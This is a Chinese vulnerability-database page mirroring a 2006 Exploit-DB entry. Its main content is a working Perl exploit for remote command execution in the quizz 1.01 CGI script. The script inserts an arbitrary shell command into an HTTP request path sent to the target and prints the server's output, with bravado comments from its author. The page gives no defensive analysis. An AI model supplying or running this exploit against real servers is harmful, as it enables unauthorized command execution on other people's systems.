quizz 1.01 - 'quizz.pl' Remote Command Execution

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1055657 漏洞类型
发布时间 2006-04-13 更新时间 2006-04-13
CVE编号 N/A CNNVD-ID N/A
漏洞平台 CGI CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/1670
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
#!/usr/bin/perl
#
#  quizz.p exploit by FOX_MULDER (fox_mulder@abv.bg)
#
#  Vulnerability foud by WBYTE.
#
#  Born to be root !!!
#  
#  !!!!!!!!!!!!!!!THANKS to WBYTE !!!!!!!!!!!!!!!!!
#
#  FACT:Wbyte doesn't sleeps , he waits !.
#  0day
####################################################################################

use IO::Socket;
use LWP::Simple; 

sub Usage {
print STDERR "\nFOX_MULDER DID IT AGAIN !!!\n";
print STDERR "Usage:\nquiz.pl <www.example.com> </path/> \"cmd\"\n";
exit;
}

if (@ARGV < 3)
{
 Usage();
}


$host = @ARGV[0];
$path = @ARGV[1];
$command = @ARGV[2];
print "\n\n !!! PRIVATE PRIVATE PRIVATE !!! \n\n";
print "quizz.pl 0day Remote Command Execution Exploit by FOX_MULDER\n";

print "\n[+] Conecting to $host\n";
print "\n[+] Injecting command . . .\n\n";

my $result = get("http://$host$path/quizz.pl/ask/;$command|"); 

if (defined $result) { 
print "fox\@nasa# $result"; 
} 
else { 
print "Error with request.\n"; 
}

# milw0rm.com [2006-04-13]